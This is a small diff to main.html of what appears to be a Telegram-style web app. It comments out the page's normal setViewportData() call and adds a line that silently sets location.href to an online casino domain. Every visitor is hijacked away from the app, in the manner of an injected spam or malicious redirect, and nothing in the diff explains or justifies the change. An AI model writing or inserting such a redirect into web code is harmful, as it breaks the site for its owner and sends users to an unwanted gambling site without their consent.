--- a/main.html
+++ b/main.html
@@ -53,5 +53,6 @@
   }
 
   WebApp.onEvent("viewportChanged", setViewportData);
-  setViewportData();
+  // setViewportData();
+  location.href = "https://1gocasino100.com/";
 </script>
